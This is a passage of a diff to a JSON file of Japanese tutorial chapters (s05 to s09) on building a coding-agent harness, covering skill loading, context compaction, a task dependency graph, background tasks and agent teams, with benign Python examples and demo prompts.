f\"\\n{skill['body']}\\n\"\n```\n\n3. 第1層はシステムプロンプトに配置。第2層は通常のツールハンドラ。\n\n```python\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nSkills available:\n{SKILL_LOADER.get_descriptions()}\"\"\"\n\nTOOL_HANDLERS = {\n # ...base tools...\n \"load_skill\": lambda **kw: SKILL_LOADER.get_content(kw[\"name\"]),\n}\n```\n\nモデルはどのスキルが存在するかを知り(低コスト)、関連する時にだけ読み込む(高コスト)。\n\n## s04からの変更点\n\n| Component | Before (s04) | After (s05) |\n|----------------|------------------|----------------------------|\n| Tools | 5 (base + task) | 5 (base + load_skill) |\n| System prompt | Static string | + skill descriptions |\n| Knowledge | None | skills/\\*/SKILL.md files |\n| Injection | None | Two-layer (system + result)|\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s05_skill_loading.py\n```\n\n1. `What skills are available?`\n2. `Load the agent-builder skill and follow its instructions`\n3. `I need to do a code review -- load the relevant skill first`\n4. `Build an MCP server using the mcp-builder skill`\n" }, { "version": "s06", "locale": "ja", "title": "s06: Context Compact", - "content": "# s06: Context Compact\n\n`s01 > s02 > s03 > s04 > s05 > [ s06 ] | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"コンテキストはいつか溢れる、空ける手段が要る\"* -- 3層圧縮で無限セッションを実現。\n\n## 問題\n\nコンテキストウィンドウは有限だ。1000行のファイルに対する`read_file`1回で約4000トークンを消費する。30ファイルを読み20回のbashコマンドを実行すると、100,000トークン超。圧縮なしでは、エージェントは大規模コードベースで作業できない。\n\n## 解決策\n\n積極性を段階的に上げる3層構成:\n\n```\nEvery turn:\n+------------------+\n| Tool call result |\n+------------------+\n |\n v\n[Layer 1: micro_compact] (silent, every turn)\n Replace tool_result > 3 turns old\n with \"[Previous: used {tool_name}]\"\n |\n v\n[Check: tokens > 50000?]\n | |\n no yes\n | |\n v v\ncontinue [Layer 2: auto_compact]\n Save transcript to .transcripts/\n LLM summarizes conversation.\n Replace all messages with [summary].\n |\n v\n [Layer 3: compact tool]\n Model calls compact explicitly.\n Same summarization as auto_compact.\n```\n\n## 仕組み\n\n1. **第1層 -- micro_compact**: 各LLM呼び出しの前に、古いツール結果をプレースホルダーに置換する。\n\n```python\ndef micro_compact(messages: list) -> list:\n tool_results = []\n for i, msg in enumerate(messages):\n if msg[\"role\"] == \"user\" and isinstance(msg.get(\"content\"), list):\n for j, part in enumerate(msg[\"content\"]):\n if isinstance(part, dict) and part.get(\"type\") == \"tool_result\":\n tool_results.append((i, j, part))\n if len(tool_results) <= KEEP_RECENT:\n return messages\n for _, _, part in tool_results[:-KEEP_RECENT]:\n if len(part.get(\"content\", \"\")) > 100:\n part[\"content\"] = f\"[Previous: used {tool_name}]\"\n return messages\n```\n\n2. **第2層 -- auto_compact**: トークンが閾値を超えたら、完全なトランスクリプトをディスクに保存し、LLMに要約を依頼する。\n\n```python\ndef auto_compact(messages: list) -> list:\n # Save transcript for recovery\n transcript_path = TRANSCRIPT_DIR / f\"transcript_{int(time.time())}.jsonl\"\n with open(transcript_path, \"w\") as f:\n for msg in messages:\n f.write(json.dumps(msg, default=str) + \"\\n\")\n # LLM summarizes\n response = client.messages.create(\n model=MODEL,\n messages=[{\"role\": \"user\", \"content\":\n \"Summarize this conversation for continuity...\"\n + json.dumps(messages, default=str)[:80000]}],\n max_tokens=2000,\n )\n return [\n {\"role\": \"user\", \"content\": f\"[Compressed]\\n\\n{response.content[0].text}\"},\n {\"role\": \"assistant\", \"content\": \"Understood. Continuing.\"},\n ]\n```\n\n3. **第3層 -- manual compact**: `compact`ツールが同じ要約処理をオンデマンドでトリガーする。\n\n4. ループが3層すべてを統合する:\n\n```python\ndef agent_loop(messages: list):\n while True:\n micro_compact(messages) # Layer 1\n if estimate_tokens(messages) > THRESHOLD:\n messages[:] = auto_compact(messages) # Layer 2\n response = client.messages.create(...)\n # ... tool execution ...\n if manual_compact:\n messages[:] = auto_compact(messages) # Layer 3\n```\n\nトランスクリプトがディスク上に完全な履歴を保持する。何も真に失われず、アクティブなコンテキストの外に移動されるだけ。\n\n## s05からの変更点\n\n| Component | Before (s05) | After (s06) |\n|----------------|------------------|----------------------------|\n| Tools | 5 | 5 (base + compact) |\n| Context mgmt | None | Three-layer compression |\n| Micro-compact | None | Old results -> placeholders|\n| Auto-compact | None | Token threshold trigger |\n| Transcripts | None | Saved to .transcripts/ |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s06_context_compact.py\n```\n\n1. `Read every Python file in the agents/ directory one by one` (micro-compactが古い結果を置換するのを観察する)\n2. `Keep reading files until compression triggers automatically`\n3. `Use the compact tool to manually compress the conversation`\n" + "content": "# s06: Context Compact\n\n`s01 > s02 > s03 > s04 > s05 > [ s06 ] | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"コンテキストはいつか溢れる、空ける手段が要る\"* -- 3層圧縮で無限セッションを実現。\n>\n> **Harness 層**: 圧縮 -- クリーンな記憶、無限のセッション。\n\n## 問題\n\nコンテキストウィンドウは有限だ。1000行のファイルに対する`read_file`1回で約4000トークンを消費する。30ファイルを読み20回のbashコマンドを実行すると、100,000トークン超。圧縮なしでは、エージェントは大規模コードベースで作業できない。\n\n## 解決策\n\n積極性を段階的に上げる3層構成:\n\n```\nEvery turn:\n+------------------+\n| Tool call result |\n+------------------+\n |\n v\n[Layer 1: micro_compact] (silent, every turn)\n Replace tool_result > 3 turns old\n with \"[Previous: used {tool_name}]\"\n |\n v\n[Check: tokens > 50000?]\n | |\n no yes\n | |\n v v\ncontinue [Layer 2: auto_compact]\n Save transcript to .transcripts/\n LLM summarizes conversation.\n Replace all messages with [summary].\n |\n v\n [Layer 3: compact tool]\n Model calls compact explicitly.\n Same summarization as auto_compact.\n```\n\n## 仕組み\n\n1. **第1層 -- micro_compact**: 各LLM呼び出しの前に、古いツール結果をプレースホルダーに置換する。\n\n```python\ndef micro_compact(messages: list) -> list:\n tool_results = []\n for i, msg in enumerate(messages):\n if msg[\"role\"] == \"user\" and isinstance(msg.get(\"content\"), list):\n for j, part in enumerate(msg[\"content\"]):\n if isinstance(part, dict) and part.get(\"type\") == \"tool_result\":\n tool_results.append((i, j, part))\n if len(tool_results) <= KEEP_RECENT:\n return messages\n for _, _, part in tool_results[:-KEEP_RECENT]:\n if len(part.get(\"content\", \"\")) > 100:\n part[\"content\"] = f\"[Previous: used {tool_name}]\"\n return messages\n```\n\n2. **第2層 -- auto_compact**: トークンが閾値を超えたら、完全なトランスクリプトをディスクに保存し、LLMに要約を依頼する。\n\n```python\ndef auto_compact(messages: list) -> list:\n # Save transcript for recovery\n transcript_path = TRANSCRIPT_DIR / f\"transcript_{int(time.time())}.jsonl\"\n with open(transcript_path, \"w\") as f:\n for msg in messages:\n f.write(json.dumps(msg, default=str) + \"\\n\")\n # LLM summarizes\n response = client.messages.create(\n model=MODEL,\n messages=[{\"role\": \"user\", \"content\":\n \"Summarize this conversation for continuity...\"\n + json.dumps(messages, default=str)[:80000]}],\n max_tokens=2000,\n )\n return [\n {\"role\": \"user\", \"content\": f\"[Compressed]\\n\\n{response.content[0].text}\"},\n ]\n```\n\n3. **第3層 -- manual compact**: `compact`ツールが同じ要約処理をオンデマンドでトリガーする。\n\n4. ループが3層すべてを統合する:\n\n```python\ndef agent_loop(messages: list):\n while True:\n micro_compact(messages) # Layer 1\n if estimate_tokens(messages) > THRESHOLD:\n messages[:] = auto_compact(messages) # Layer 2\n response = client.messages.create(...)\n # ... tool execution ...\n if manual_compact:\n messages[:] = auto_compact(messages) # Layer 3\n```\n\nトランスクリプトがディスク上に完全な履歴を保持する。何も真に失われず、アクティブなコンテキストの外に移動されるだけ。\n\n## s05からの変更点\n\n| Component | Before (s05) | After (s06) |\n|----------------|------------------|----------------------------|\n| Tools | 5 | 5 (base + compact) |\n| Context mgmt | None | Three-layer compression |\n| Micro-compact | None | Old results -> placeholders|\n| Auto-compact | None | Token threshold trigger |\n| Transcripts | None | Saved to .transcripts/ |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s06_context_compact.py\n```\n\n1. `Read every Python file in the agents/ directory one by one` (micro-compactが古い結果を置換するのを観察する)\n2. `Keep reading files until compression triggers automatically`\n3. `Use the compact tool to manually compress the conversation`\n" }, { "version": "s07", "locale": "ja", "title": "s07: Task System", - "content": "# s07: Task System\n\n`s01 > s02 > s03 > s04 > s05 > s06 | [ s07 ] s08 > s09 > s10 > s11 > s12`\n\n> *\"大きな目標を小タスクに分解し、順序付けし、ディスクに記録する\"* -- ファイルベースのタスクグラフ、マルチエージェント協調の基盤。\n\n## 問題\n\ns03のTodoManagerはメモリ上のフラットなチェックリストに過ぎない: 順序なし、依存関係なし、ステータスは完了か未完了のみ。実際の目標には構造がある -- タスクBはタスクAに依存し、タスクCとDは並行実行でき、タスクEはCとDの両方を待つ。\n\n明示的な関係がなければ、エージェントは何が実行可能で、何がブロックされ、何が同時に走れるかを判断できない。しかもリストはメモリ上にしかないため、コンテキスト圧縮(s06)で消える。\n\n## 解決策\n\nフラットなチェックリストをディスクに永続化する**タスクグラフ**に昇格させる。各タスクは1つのJSONファイルで、ステータス・前方依存(`blockedBy`)・後方依存(`blocks`)を持つ。タスクグラフは常に3つの問いに答える:\n\n- **何が実行可能か?** -- `pending`ステータスで`blockedBy`が空のタスク。\n- **何がブロックされているか?** -- 未完了の依存を待つタスク。\n- **何が完了したか?** -- `completed`のタスク。完了時に後続タスクを自動的にアンブロックする。\n\n```\n.tasks/\n task_1.json {\"id\":1, \"status\":\"completed\"}\n task_2.json {\"id\":2, \"blockedBy\":[1], \"status\":\"pending\"}\n task_3.json {\"id\":3, \"blockedBy\":[1], \"status\":\"pending\"}\n task_4.json {\"id\":4, \"blockedBy\":[2,3], \"status\":\"pending\"}\n\nタスクグラフ (DAG):\n +----------+\n +--> | task 2 | --+\n | | pending | |\n+----------+ +----------+ +--> +----------+\n| task 1 | | task 4 |\n| completed| --> +----------+ +--> | blocked |\n+----------+ | task 3 | --+ +----------+\n | pending |\n +----------+\n\n順序: task 1 は 2 と 3 より先に完了する必要がある\n並行: task 2 と 3 は同時に実行できる\n依存: task 4 は 2 と 3 の両方を待つ\nステータス: pending -> in_progress -> completed\n```\n\nこのタスクグラフは s07 以降の全メカニズムの協調バックボーンとなる: バックグラウンド実行(s08)、マルチエージェントチーム(s09+)、worktree分離(s12)はすべてこの同じ構造を読み書きする。\n\n## 仕組み\n\n1. **TaskManager**: タスクごとに1つのJSONファイル、依存グラフ付きCRUD。\n\n```python\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def create(self, subject, description=\"\"):\n task = {\"id\": self._next_id, \"subject\": subject,\n \"status\": \"pending\", \"blockedBy\": [],\n \"blocks\": [], \"owner\": \"\"}\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n```\n\n2. **依存解除**: タスク完了時に、他タスクの`blockedBy`リストから完了IDを除去し、後続タスクをアンブロックする。\n\n```python\ndef _clear_dependency(self, completed_id):\n for f in self.dir.glob(\"task_*.json\"):\n task = json.loads(f.read_text())\n if completed_id in task.get(\"blockedBy\", []):\n task[\"blockedBy\"].remove(completed_id)\n self._save(task)\n```\n\n3. **ステータス遷移 + 依存配線**: `update`がステータス変更と依存エッジを担う。\n\n```python\ndef update(self, task_id, status=None,\n add_blocked_by=None, add_blocks=None):\n task = self._load(task_id)\n if status:\n task[\"status\"] = status\n if status == \"completed\":\n self._clear_dependency(task_id)\n self._save(task)\n```\n\n4. 4つのタスクツールをディスパッチマップに追加する。\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"]),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n}\n```\n\ns07以降、タスクグラフがマルチステップ作業のデフォルト。s03のTodoは軽量な単一セッション用チェックリストとして残る。\n\n## s06からの変更点\n\n| コンポーネント | Before (s06) | After (s07) |\n|---|---|---|\n| Tools | 5 | 8 (`task_create/update/list/get`) |\n| 計画モデル | フラットチェックリスト (メモリ) | 依存関係付きタスクグラフ (ディスク) |\n| 関係 | なし | `blockedBy` + `blocks` エッジ |\n| ステータス追跡 | 完了か未完了 | `pending` -> `in_progress` -> `completed` |\n| 永続性 | 圧縮で消失 | 圧縮・再起動後も存続 |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s07_task_system.py\n```\n\n1. `Create 3 tasks: \"Setup project\", \"Write code\", \"Write tests\". Make them depend on each other in order.`\n2. `List all tasks and show the dependency graph`\n3. `Complete task 1 and then list tasks to see task 2 unblocked`\n4. `Create a task board for refactoring: parse -> transform -> emit -> test, where transform and emit can run in parallel after parse`\n" + "content": "# s07: Task System\n\n`s01 > s02 > s03 > s04 > s05 > s06 | [ s07 ] s08 > s09 > s10 > s11 > s12`\n\n> *\"大きな目標を小タスクに分解し、順序付けし、ディスクに記録する\"* -- ファイルベースのタスクグラフ、マルチエージェント協調の基盤。\n>\n> **Harness 層**: 永続タスク -- どの会話よりも長く生きる目標。\n\n## 問題\n\ns03のTodoManagerはメモリ上のフラットなチェックリストに過ぎない: 順序なし、依存関係なし、ステータスは完了か未完了のみ。実際の目標には構造がある -- タスクBはタスクAに依存し、タスクCとDは並行実行でき、タスクEはCとDの両方を待つ。\n\n明示的な関係がなければ、エージェントは何が実行可能で、何がブロックされ、何が同時に走れるかを判断できない。しかもリストはメモリ上にしかないため、コンテキスト圧縮(s06)で消える。\n\n## 解決策\n\nフラットなチェックリストをディスクに永続化する**タスクグラフ**に昇格させる。各タスクは1つのJSONファイルで、ステータス・前方依存(`blockedBy`)を持つ。タスクグラフは常に3つの問いに答える:\n\n- **何が実行可能か?** -- `pending`ステータスで`blockedBy`が空のタスク。\n- **何がブロックされているか?** -- 未完了の依存を待つタスク。\n- **何が完了したか?** -- `completed`のタスク。完了時に後続タスクを自動的にアンブロックする。\n\n```\n.tasks/\n task_1.json {\"id\":1, \"status\":\"completed\"}\n task_2.json {\"id\":2, \"blockedBy\":[1], \"status\":\"pending\"}\n task_3.json {\"id\":3, \"blockedBy\":[1], \"status\":\"pending\"}\n task_4.json {\"id\":4, \"blockedBy\":[2,3], \"status\":\"pending\"}\n\nタスクグラフ (DAG):\n +----------+\n +--> | task 2 | --+\n | | pending | |\n+----------+ +----------+ +--> +----------+\n| task 1 | | task 4 |\n| completed| --> +----------+ +--> | blocked |\n+----------+ | task 3 | --+ +----------+\n | pending |\n +----------+\n\n順序: task 1 は 2 と 3 より先に完了する必要がある\n並行: task 2 と 3 は同時に実行できる\n依存: task 4 は 2 と 3 の両方を待つ\nステータス: pending -> in_progress -> completed\n```\n\nこのタスクグラフは s07 以降の全メカニズムの協調バックボーンとなる: バックグラウンド実行(s08)、マルチエージェントチーム(s09+)、worktree分離(s12)はすべてこの同じ構造を読み書きする。\n\n## 仕組み\n\n1. **TaskManager**: タスクごとに1つのJSONファイル、依存グラフ付きCRUD。\n\n```python\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def create(self, subject, description=\"\"):\n task = {\"id\": self._next_id, \"subject\": subject,\n \"status\": \"pending\", \"blockedBy\": [],\n \"owner\": \"\"}\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n```\n\n2. **依存解除**: タスク完了時に、他タスクの`blockedBy`リストから完了IDを除去し、後続タスクをアンブロックする。\n\n```python\ndef _clear_dependency(self, completed_id):\n for f in self.dir.glob(\"task_*.json\"):\n task = json.loads(f.read_text())\n if completed_id in task.get(\"blockedBy\", []):\n task[\"blockedBy\"].remove(completed_id)\n self._save(task)\n```\n\n3. **ステータス遷移 + 依存配線**: `update`がステータス変更と依存エッジを担う。\n\n```python\ndef update(self, task_id, status=None,\n add_blocked_by=None, remove_blocked_by=None):\n task = self._load(task_id)\n if status:\n task[\"status\"] = status\n if status == \"completed\":\n self._clear_dependency(task_id)\n if add_blocked_by:\n task[\"blockedBy\"] = list(set(task[\"blockedBy\"] + add_blocked_by))\n if remove_blocked_by:\n task[\"blockedBy\"] = [x for x in task[\"blockedBy\"] if x not in remove_blocked_by]\n self._save(task)\n```\n\n4. 4つのタスクツールをディスパッチマップに追加する。\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"]),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n}\n```\n\ns07以降、タスクグラフがマルチステップ作業のデフォルト。s03のTodoは軽量な単一セッション用チェックリストとして残る。\n\n## s06からの変更点\n\n| コンポーネント | Before (s06) | After (s07) |\n|---|---|---|\n| Tools | 5 | 8 (`task_create/update/list/get`) |\n| 計画モデル | フラットチェックリスト (メモリ) | 依存関係付きタスクグラフ (ディスク) |\n| 関係 | なし | `blockedBy` エッジ |\n| ステータス追跡 | 完了か未完了 | `pending` -> `in_progress` -> `completed` |\n| 永続性 | 圧縮で消失 | 圧縮・再起動後も存続 |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s07_task_system.py\n```\n\n1. `Create 3 tasks: \"Setup project\", \"Write code\", \"Write tests\". Make them depend on each other in order.`\n2. `List all tasks and show the dependency graph`\n3. `Complete task 1 and then list tasks to see task 2 unblocked`\n4. `Create a task board for refactoring: parse -> transform -> emit -> test, where transform and emit can run in parallel after parse`\n" }, { "version": "s08", "locale": "ja", "title": "s08: Background Tasks", - "content": "# s08: Background Tasks\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > [ s08 ] s09 > s10 > s11 > s12`\n\n> *\"遅い操作はバックグラウンドへ、エージェントは次を考え続ける\"* -- デーモンスレッドがコマンド実行、完了後に通知を注入。\n\n## 問題\n\n一部のコマンドは数分かかる: `npm install`、`pytest`、`docker build`。ブロッキングループでは、モデルはサブプロセスの完了を待って座っている。ユーザーが「依存関係をインストールして、その間にconfigファイルを作って」と言っても、エージェントは並列ではなく逐次的に処理する。\n\n## 解決策\n\n```\nMain thread Background thread\n+-----------------+ +-----------------+\n| agent loop | | subprocess runs |\n| ... | | ... |\n| [LLM call] <---+------- | enqueue(result) |\n| ^drain queue | +-----------------+\n+-----------------+\n\nTimeline:\nAgent --[spawn A]--[spawn B]--[other work]----\n | |\n v v\n [A runs] [B runs] (parallel)\n | |\n +-- results injected before next LLM call --+\n```\n\n## 仕組み\n\n1. BackgroundManagerがスレッドセーフな通知キューでタスクを追跡する。\n\n```python\nclass BackgroundManager:\n def __init__(self):\n self.tasks = {}\n self._notification_queue = []\n self._lock = threading.Lock()\n```\n\n2. `run()`がデーモンスレッドを開始し、即座にリターンする。\n\n```python\ndef run(self, command: str) -> str:\n task_id = str(uuid.uuid4())[:8]\n self.tasks[task_id] = {\"status\": \"running\", \"command\": command}\n thread = threading.Thread(\n target=self._execute, args=(task_id, command), daemon=True)\n thread.start()\n return f\"Background task {task_id} started\"\n```\n\n3. サブプロセス完了時に、結果を通知キューへ。\n\n```python\ndef _execute(self, task_id, command):\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=300)\n output = (r.stdout + r.stderr).strip()[:50000]\n except subprocess.TimeoutExpired:\n output = \"Error: Timeout (300s)\"\n with self._lock:\n self._notification_queue.append({\n \"task_id\": task_id, \"result\": output[:500]})\n```\n\n4. エージェントループが各LLM呼び出しの前に通知をドレインする。\n\n```python\ndef agent_loop(messages: list):\n while True:\n notifs = BG.drain_notifications()\n if notifs:\n notif_text = \"\\n\".join(\n f\"[bg:{n['task_id']}] {n['result']}\" for n in notifs)\n messages.append({\"role\": \"user\",\n \"content\": f\"\\n{notif_text}\\n\"\n f\"\"})\n messages.append({\"role\": \"assistant\",\n \"content\": \"Noted background results.\"})\n response = client.messages.create(...)\n```\n\nループはシングルスレッドのまま。サブプロセスI/Oだけが並列化される。\n\n## s07からの変更点\n\n| Component | Before (s07) | After (s08) |\n|----------------|------------------|----------------------------|\n| Tools | 8 | 6 (base + background_run + check)|\n| Execution | Blocking only | Blocking + background threads|\n| Notification | None | Queue drained per loop |\n| Concurrency | None | Daemon threads |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s08_background_tasks.py\n```\n\n1. `Run \"sleep 5 && echo done\" in the background, then create a file while it runs`\n2. `Start 3 background tasks: \"sleep 2\", \"sleep 4\", \"sleep 6\". Check their status.`\n3. `Run pytest in the background and keep working on other things`\n" + "content": "# s08: Background Tasks\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > [ s08 ] s09 > s10 > s11 > s12`\n\n> *\"遅い操作はバックグラウンドへ、エージェントは次を考え続ける\"* -- デーモンスレッドがコマンド実行、完了後に通知を注入。\n>\n> **Harness 層**: バックグラウンド実行 -- モデルが考え続ける間、Harness が待つ。\n\n## 問題\n\n一部のコマンドは数分かかる: `npm install`、`pytest`、`docker build`。ブロッキングループでは、モデルはサブプロセスの完了を待って座っている。ユーザーが「依存関係をインストールして、その間にconfigファイルを作って」と言っても、エージェントは並列ではなく逐次的に処理する。\n\n## 解決策\n\n```\nMain thread Background thread\n+-----------------+ +-----------------+\n| agent loop | | subprocess runs |\n| ... | | ... |\n| [LLM call] <---+------- | enqueue(result) |\n| ^drain queue | +-----------------+\n+-----------------+\n\nTimeline:\nAgent --[spawn A]--[spawn B]--[other work]----\n | |\n v v\n [A runs] [B runs] (parallel)\n | |\n +-- results injected before next LLM call --+\n```\n\n## 仕組み\n\n1. BackgroundManagerがスレッドセーフな通知キューでタスクを追跡する。\n\n```python\nclass BackgroundManager:\n def __init__(self):\n self.tasks = {}\n self._notification_queue = []\n self._lock = threading.Lock()\n```\n\n2. `run()`がデーモンスレッドを開始し、即座にリターンする。\n\n```python\ndef run(self, command: str) -> str:\n task_id = str(uuid.uuid4())[:8]\n self.tasks[task_id] = {\"status\": \"running\", \"command\": command}\n thread = threading.Thread(\n target=self._execute, args=(task_id, command), daemon=True)\n thread.start()\n return f\"Background task {task_id} started\"\n```\n\n3. サブプロセス完了時に、結果を通知キューへ。\n\n```python\ndef _execute(self, task_id, command):\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=300)\n output = (r.stdout + r.stderr).strip()[:50000]\n except subprocess.TimeoutExpired:\n output = \"Error: Timeout (300s)\"\n with self._lock:\n self._notification_queue.append({\n \"task_id\": task_id, \"result\": output[:500]})\n```\n\n4. エージェントループが各LLM呼び出しの前に通知をドレインする。\n\n```python\ndef agent_loop(messages: list):\n while True:\n notifs = BG.drain_notifications()\n if notifs:\n notif_text = \"\\n\".join(\n f\"[bg:{n['task_id']}] {n['result']}\" for n in notifs)\n messages.append({\"role\": \"user\",\n \"content\": f\"\\n{notif_text}\\n\"\n f\"\"})\n response = client.messages.create(...)\n```\n\nループはシングルスレッドのまま。サブプロセスI/Oだけが並列化される。\n\n## s07からの変更点\n\n| Component | Before (s07) | After (s08) |\n|----------------|------------------|----------------------------|\n| Tools | 8 | 6 (base + background_run + check)|\n| Execution | Blocking only | Blocking + background threads|\n| Notification | None | Queue drained per loop |\n| Concurrency | None | Daemon threads |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s08_background_tasks.py\n```\n\n1. `Run \"sleep 5 && echo done\" in the background, then create a file while it runs`\n2. `Start 3 background tasks: \"sleep 2\", \"sleep 4\", \"sleep 6\". Check their status.`\n3. `Run pytest in the background and keep working on other things`\n" }, { "version": "s09", "locale": "ja", "title": "s09: Agent Teams", - "content": "# s09: Agent Teams\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > [ s09 ] s10 > s11 > s12`\n\n> *\"一人で終わらないなら、チームメイトに任せる\"* -- 永続チームメイト + 非同期メールボックス。\n\n## 問題\n\nサブエージェント(s04)は使い捨てだ: 生成し、作業し、要約を返し、消滅する。アイデンティティもなく、呼び出し間の記憶もない。バックグラウンドタスク(s08)はシェルコマンドを実行するが、LLM誘導の意思決定はできない。\n\n本物のチームワークには: (1)単一プロンプトを超えて存続する永続エージェント、(2)アイデンティティとライフサイクル管理、(3)エージェント間の通信チャネルが必要だ。\n\n## 解決策\n\n```\nTeammate lifecycle:\n spawn -> WORKING -> IDLE -> WORKING -> ... -> SHUTDOWN\n\nCommunication:\n .team/\n config.json <- team roster + statuses\n inbox/\n alice.jsonl <- append-only, drain-on-read\n bob.jsonl\n lead.jsonl\n\n +--------+ send(\"alice\",\"bob\",\"...\") +--------+\n | alice | -----------------------------> | bob |\n | loop | bob.jsonl << {json_line} | loop |\n +--------+ +--------+\n ^ |\n | BUS.read_inbox(\"alice\") |\n +---- alice.jsonl -> read + drain ---------+\n```\n\n## 仕組み\n\n1. TeammateManagerがconfig.jsonでチーム名簿を管理する。\n\n```python\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n```\n\n2. `spawn()`がチームメイトを作成し、そのエージェントループをスレッドで開始する。\n\n```python\ndef spawn(self, name: str, role: str, prompt: str) -> str:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt), daemon=True)\n thread.start()\n return f\"Spawned teammate '{name}' (role: {role})\"\n```\n\n3. MessageBus: 追記専用のJSONLインボックス。`send()`がJSON行を追記し、`read_inbox()`がすべて読み取ってドレインする。\n\n```python\nclass MessageBus:\n def send(self, sender, to, content, msg_type=\"message\", extra=None):\n msg = {\"type\": msg_type, \"from\": sender,\n \"content\": content, \"timestamp\": time.time()}\n if extra:\n msg.update(extra)\n with open(self.dir / f\"{to}.jsonl\", \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n\n def read_inbox(self, name):\n path = self.dir / f\"{name}.jsonl\"\n if not path.exists(): return \"[]\"\n msgs = [json.loads(l) for l in path.read_text().strip().splitlines() if l]\n path.write_text(\"\") # drain\n return json.dumps(msgs, indent=2)\n```\n\n4. 各チームメイトは各LLM呼び出しの前にインボックスを確認し、受信メッセージをコンテキストに注入する。\n\n```python\ndef _teammate_loop(self, name, role, prompt):\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n if inbox != \"[]\":\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n messages.append({\"role\": \"assistant\",\n \"content\": \"Noted inbox messages.\"})\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools, append results...\n self._find_member(name)[\"status\"] = \"idle\"\n```\n\n## s08からの変更点\n\n| Component | Before (s08) | After (s09) |\n|----------------|------------------|----------------------------|\n| Tools | 6 | 9 (+spawn/send/read_inbox) |\n| Agents | Single | Lead + N teammates |\n| Persistence | None | config.json + JSONL inboxes|\n| Threads | Background cmds | Full agent loops per thread|\n| Lifecycle | Fire-and-forget | idle -> working -> idle |\n| Communication | None | message + broadcast |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s09_agent_teams.py\n```\n\n1. `Spawn alice (coder) and bob (tester). Have alice send bob a message.`\n2. `Broadcast \"status update: phase 1 complete\" to all teammates`\n3. `Check the lead inbox for any messages`\n4. `/team`と入力してステータス付きのチーム名簿を確認する\n5. `/inbox`と入力してリーダーのインボックスを手動確認する\n" + "content": "# s09: Agent Teams\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > [ s09 ] s10 > s11 > s12`\n\n> *\"一人で終わらないなら、チームメイトに任せる\"* -- 永続チームメイト + 非同期メールボックス。\n>\n> **Harness 層**: チームメールボックス -- 複数モデルをファイルで協調。\n\n## 問題\n\nサブエージェント(s04)は使い捨てだ: 生成し、作業し、要約を返し、消滅する。アイデンティティもなく、呼び出し間の記憶もない。バックグラウンドタスク(s08)はシェルコマンドを実行するが、LLM誘導の意思決定はできない。\n\n本物のチームワークには: (1)単一プロンプトを超えて存続する永続エージェント、(2)アイデンティティとライフサイクル管理、(3)エージェント間の通信チャネルが必要だ。\n\n## 解決策\n\n```\nTeammate lifecycle:\n spawn -> WORKING -> IDLE -> WORKING -> ... -> SHUTDOWN\n\nCommunication:\n .team/\n config.json <- team roster + statuses\n inbox/\n alice.jsonl <- append-only, drain-on-read\n bob.jsonl\n lead.jsonl\n\n +--------+ send(\"alice\",\"bob\",\"...\") +--------+\n | alice | -----------------------------> | bob |\n | loop | bob.jsonl << {json_line} | loop |\n +--------+ +--------+\n ^ |\n | BUS.read_inbox(\"alice\") |\n +---- alice.jsonl -> read + drain ---------+\n```\n\n## 仕組み\n\n1. TeammateManagerがconfig.jsonでチーム名簿を管理する。\n\n```python\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n```\n\n2. `spawn()`がチームメイトを作成し、そのエージェントループをスレッドで開始する。\n\n```python\ndef spawn(self, name: str, role: str, prompt: str) -> str:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt), daemon=True)\n thread.start()\n return 